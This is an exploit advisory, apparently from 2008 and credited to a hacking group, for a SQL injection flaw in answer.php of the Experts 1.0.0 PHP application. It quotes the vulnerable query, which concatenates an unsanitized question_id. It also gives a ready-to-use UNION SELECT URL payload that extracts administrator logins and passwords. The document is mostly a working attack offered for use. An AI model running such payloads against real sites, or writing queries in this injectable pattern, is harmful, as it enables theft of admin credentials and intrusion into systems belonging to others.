1 =========================================================
2 Experts (answer.php) Remote SQL Injection Vulnerability
3 =========================================================
4
5 ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
6 | ||||||||| ‘−−−−−−−−’ | O
.. CWH Underground Hacking Team ..
7 ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
8 ‘\_,−−−−−−−, _________________________|
9 / XXXXXX /‘| /
10 / XXXXXX / ‘\ /
11 / XXXXXX /\______(
12 / XXXXXX /
13 / XXXXXX /
14 (________(
15 ‘−−−−−−’
16
17 AUTHOR : CWH Underground
18 DATE : 10 June 2008
19 SITE : www.citec.us
20
21
22 #####################################################
23 APPLICATION : Experts
24 VERSION : 1.0.0
25 DOWNLOAD : http://downloads.sourceforge.net/experts
26 #####################################################
27
28 −−−SQL Injection Exploit−−−
29
30 ***magic_quotes_gpc = off***
31
32 ##################################################################################
33 Line:
34 67: $con= "SELECT question_text, question_expert, question_category, question_closed,
35 68: TIME_TO_SEC(TIMEDIFF(NOW(),question_date)) AS seconds_ago,
36 69: user_login, user_id, category_name, expert_login
37 70: FROM question
38 71: INNER JOIN (user,category, expert)
39 72: ON (question_user=user_id
40 73: AND question_category=category_id AND question_expert=expert_id )
41 74: WHERE question_id=".$question_id;
42 75: //echo $con."<br>";
43 76: $fai_con=mysql_query($con) or die(mysql_error());
44 ##################################################################################
45
46 EXPLOIT:
47
48 http://[Target]/[experts_path]/answer.php?question_id=41 AND 1=2 UNION SELECT concat(administrator_login,0x3a,adminis
trator_password),2,3,4,5,6,7,8,9 FROM administrator
49
50
51 ##################################################################
Page 1/2
Experts answer.php Remote SQL Injection Vulnerability
CWH Underground
06/10/2008
52 # Greetz: ZeQ3